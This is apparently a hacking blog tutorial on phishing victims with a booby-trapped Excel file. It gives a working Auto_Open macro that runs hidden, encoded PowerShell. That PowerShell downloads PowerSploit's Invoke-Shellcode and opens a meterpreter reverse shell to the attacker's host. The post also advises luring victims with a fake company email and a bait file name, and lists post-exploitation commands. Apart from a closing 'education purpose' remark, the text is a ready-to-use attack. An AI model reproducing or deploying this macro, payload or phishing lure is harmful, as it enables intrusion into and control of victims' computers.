After the previous post, I think you guys have tried some tricks with Social Engineering Toolkit ( SET ). Believe me, this tool is worth to try. Today, I will show you my old trick that related to Social Engineering. Sometimes when you get in the victim’s network, you can’t use ARP Poisoning, I mean Web Based Attacks. At this point, you guys should try to inject some payloads into some documents and send it via a fake company mail. For example, I use Excel Macro. You guys could follow my quick tutorial to get a whole point of it.
- Firstly, you guys open Excel then put here some funny information like this:
- Secondly, you create a macro named Auto_Open() like this:
Sub Auto_Open() Sheets("Sheet2").Visible = True Sheets("Sheet2").Select Dim strCommand As String strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc [Base64Code]" Shell strCommand, 0 End Sub
Do you still remember how do I create a meterpreter that connect back to my host ( If you guys forgot it, you can review it by this post.
If you guys remember it, you could just encrypt this code by base64 encode:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.138 -Lport 443 -Force
And your base64 encode is here:
You just put in it the [Base64Code] above and then you have just finished your macro. Then save your file as this name: Hotgirl_Telephone.xls.
You know what I mean. 😀
- You send this excel via a mail attachment. But it has a drawback. You guys can see it here.
You guys need to use your social engineering to force the victim enable this macro feature.
- After this part, everything is done. When we turn on our Listener to listen at port 443
the victim will connect back to our host
We use this command to start interact with our session:
sessions -i 1
And show their drives:
List all the files in this drive
Or their current running processes
Because I used to use Windows command lines, so I use this command to change mode.
execute -f cmd.exe -i -H
And then you guys could list their files by dir command
You could write a note.txt file for test ( You know what I mean here ? 😉 )
echo recovery sky > note.txt
Check it appear
View its content
Then delete it.
del /q /f note.txt
Finally, if you want to exit this mode, type exit
And run this session in background
To select another session in your list
Personally, I think it is enough for you guys to test the victim computer, but always keep in mind, we do this with education purpose. 😀